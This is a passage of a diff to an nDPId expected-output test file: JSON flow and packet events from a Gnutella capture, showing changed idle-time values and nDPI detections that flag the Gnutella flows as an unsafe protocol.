+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71205,"flow_last_seen":71205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":71205,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":71205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71205,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05AtAAIAGAfsKAAIPbdaa2MRIGMoc18X9AAAAAIAC+vCfegAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71205,"flow_last_seen":71205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":71205,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":71205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71205,"pkt":"UlQAEjUCCAAn5uVZCABFAAA08yJAAIAG8AwKAAIPVtC0tcRJszsghBY3AAAAAIAC+vCuSgAAAgQFtAEDAwgBAQQC"} 00519{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":71216,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":71216,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4AsYAAP8BoC4KAAICCgACDwMBntkAAAAARQAANGWZQAB\/BrMICgACD0xEis\/EN7AX1ucS7g=="} 00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":71535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71535,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnYAAIARfQoKAAIPWKDWiXAJGMoAINufR05EED6TAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":28681,"dst_port":49046,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -374,34 +374,34 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":71540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71540,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0POoAAIARNbgKAAIPyHjzj3AJGMoAIE6sR05EED6oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71541,"flow_last_seen":71541,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71541,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":71541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71541,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02U0AAIAREUUKAAIPBbQ+ZHAJtTEAICo0R05EED6pAQFUC1FLUlAGUk5BXS\/iNQlw"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtxAAIAGndcKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq5AAIAGH9QKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":72156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72156,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP1AAIAGOuoKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LVAAIAGCWcKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lyhAAIAGNGIKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72264,"flow_last_seen":72264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":72264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0alNAAIAGzs4KAAIPG16aNcRKGMq+PzReAAAAAIAC+vDiygAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72265,"flow_last_seen":72265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72265,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":72265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72265,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvdAAIAGYVQKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VqVAAIAG\/NQKAAIPe8ofccRMTThVM2MAAAAAAIAC+vADHQAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00URAAIAGSiQKAAIPZ+hrZMRNqfSI7oMUAAAAAIAC+vAafwAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72267,"flow_last_seen":72267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72267,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":72267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72267,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnJAAIAGzTgKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":72462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72462,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAs8AAEAGtlsbXpo1CgACDxjKxEoAfQABvj80X2AS\/\/8GQwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":72462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72462,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoalRAAIAGztkKAAIPG16aNcRKGMq+PzRfAH0AAlAQ+vAjDwAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":72471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72471,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtEAAEAG0LF7yh9xCgACD004xEwAfvQBVTNjAWAS\/\/8ykwAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":72472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72472,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoVqZAAIAG\/N8KAAIPe8ofccRMTThVM2MBAH70AlAQ+vBPXwAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":72595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72595,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtUAAEAGmJxn6GtkCgACD6n0xE0Af+4BiO6DFWAS\/\/9P9AAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":72596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72596,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo0UVAAIAGSi8KAAIPZ+hrZMRNqfSI7oMVAH\/uAlAQ+vBswAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} 